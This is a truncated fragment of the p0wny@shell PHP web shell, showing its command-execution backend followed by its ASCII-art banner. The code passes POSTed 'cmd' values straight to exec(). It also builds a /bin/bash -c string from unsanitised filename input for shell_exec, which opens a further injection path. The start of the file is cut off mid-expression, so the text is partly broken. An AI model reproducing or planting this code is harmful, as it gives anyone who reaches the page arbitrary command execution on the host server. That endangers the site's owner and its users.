p0wny@shell:~#

&1)?$/", $cmd)) { chdir($cwd); preg_match("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match); chdir($match[1]); } else { chdir($cwd); exec($cmd, $stdout); } return array( "stdout" => $stdout, "cwd" => getcwd() ); } function featurePwd() { return array("cwd" => getcwd()); } function featureHint($fileName, $cwd, $type) { chdir($cwd); if ($type == 'cmd') { $cmd = "compgen -c $fileName"; } else { $cmd = "compgen -f $fileName"; } $cmd = "/bin/bash -c \"$cmd\""; $files = explode("\n", shell_exec($cmd)); return array( 'files' => $files, ); } if (isset($_GET["feature"])) { $response = NULL; switch ($_GET["feature"]) { case "shell": $cmd = $_POST['cmd']; if (!preg_match('/2>/', $cmd)) { $cmd .= ' 2>&1'; } $response = featureShell($cmd, $_POST["cwd"]); break; case "pwd": $response = featurePwd(); break; case "hint": $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']); } header("Content-Type: application/json"); echo json_encode($response); die(); } ?> p0wny@shell:~#

                
        ___                         ____      _          _ _        _  _   
 _ __  / _ \__      ___ __  _   _  / __ \ ___| |__   ___| | |_ /\/|| || |_ 
| '_ \| | | \ \ /\ / / '_ \| | | |/ / _` / __| '_ \ / _ \ | (_)/\/_  ..  _|
| |_) | |_| |\ V  V /| | | | |_| | | (_| \__ \ | | |  __/ | |_   |_      _|
| .__/ \___/  \_/\_/ |_| |_|\__, |\ \__,_|___/_| |_|\___|_|_(_)    |_||_|  
|_|                         |___/  \____/

???